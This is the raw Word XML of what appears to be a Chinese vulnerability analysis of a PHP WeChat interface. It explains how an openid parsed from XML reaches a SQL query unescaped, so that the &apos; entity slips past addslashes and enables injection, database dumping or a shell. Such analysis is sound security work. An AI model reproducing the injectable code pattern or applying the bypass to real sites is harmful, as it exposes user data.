                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126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private</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> function</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-89"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>get_user_info($fromUsername){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="2012" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$usinfo = 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);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380" w:firstLine="1831"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$usinfo_obj = $this-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>query(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"select * from ".table('members')." where weixin_openid='".$fromUsername."' limit 1");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while(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$row =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$this-&gt;fetch_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>array(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$usinfo_obj)){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rPr>
          <w:rFonts w:ascii="Times New Roma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1210" type="#_x0000_t202" style="width:337.5pt;height:99.7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2928" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$usinfo = $row;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="2012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4"/>
                    <w:ind w:left="2012" w:right="50"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>return</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> $usinfo;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="1095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$postStr</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-71"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-71"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>addslashes(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$GLOBALS["HTTP_RAW_POST_DATA"]);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0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="37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209" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:18.15pt;width:337.5pt;height:67.15pt;z-index:925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8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line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="1488"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$postObj = simplexml_load_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>string(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$postStr, 'SimpleXMLElement', LIBXML_NOCDATA);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380" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$fromUsername = $postObj-&gt;FromUserName;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="topAndBottom" anchorx="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s1208" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:101.85pt;width:337.5pt;height:83.45pt;z-index:928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$usinfo = $this-&gt;get_user_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>info(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$fromUsername);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===&gt;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</w:rPr>
                    <w:t>$this-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>query(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"select</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr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color w:val="333333"/>
                    </w:rPr>
                    <w:t>*</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr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color w:val="333333"/>
                    </w:rPr>
                    <w:t>from</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr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color w:val="333333"/>
                    </w:rPr>
                    <w:t>".table('me</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>mbers')."</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr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color w:val="333333"/>
                    </w:rPr>
                    <w:t>where weixin_openid='".$fromUsername."' limit</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-14"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>1");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宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-55"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">POST_DATA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-55"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>addslashes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="37" w:after="5" w:line="283" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">$fromUsername </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从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>simplexml_load_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>string(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后就直接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入了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>addslashes($GLOBALS["HTTP_RAW_POST_DATA"])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>就解决了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>么？答案是否定的。因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-83"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">XML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中特殊字符也可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w: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1207" type="#_x0000_t202" style="width:337.5pt;height:116.0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9"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman"/>
                      <w:sz w:val="15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  <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                  </w:pP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特殊字符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特殊含义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 xml:space="preserve">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实体编码</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="64"/>
                    <w:ind w:left="180" w:right="50"/>
                    <w:rPr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 xml:space="preserve">&gt;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开始标记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&amp;gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="50" w:line="283" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="4963"/>
                    <w:rPr>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t xml:space="preserve">&lt;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结束标记</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-27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 xml:space="preserve">&amp;lt; "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引号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 xml:space="preserve">&amp;quot; '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撇号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 xml:space="preserve">&amp;apos; &amp; </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>和号</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-26"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>&amp;amp;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1"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="37" w:line="283" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="239"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-57"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">XML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;apos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>号注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去了，并且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里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post data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有任何</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以注入任何</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-66"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句，所以我们可以导出整个数据库，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>甚至</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-55"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>getshell.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="283" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdan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80020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="99"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>看到下面的代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，也</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>许</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>有人会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，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里是有条件的，因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>里判断了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="64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206" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:19.6pt;width:337.5pt;height:181.25pt;z-index:932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6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$event === "CLICK"){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proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>if(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$_CFG['weixin_apiopen']=='0')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{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095" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$word="</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ÍøÕŸÎ¢ÐÅœÓ¿ÚÒÑŸ¹Ø±Õ";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:rPr>
                      <w:rFonts w:ascii="MS Mincho"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="5"/>
                    <w:rPr>
                      <w:rFonts w:ascii="MS Mincho"/>
                      <w:sz w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="1076" w:right="209"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;exit_word_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>message(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$word,$fromUsername,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$toUsername</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>,$</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>time);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="1061"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>CFG[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>'weixin_apiopen']=='0')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="38" w:line="283" w:lineRule="auto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group id="_x0000_s1135" style="position:absolute;left:0;text-align:left;margin-left:80.6pt;margin-top:34.5pt;width:337.75pt;height:197.8pt;z-index:9376;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1612,690" coordsize="6755,3956">
            <v:rect id="_x0000_s1205" style="position:absolute;left:1617;top:695;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1204" style="position:absolute;left:1797;top:938;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1203" style="position:absolute;left:1617;top:1201;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1202" style="position:absolute;left:1797;top:1264;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
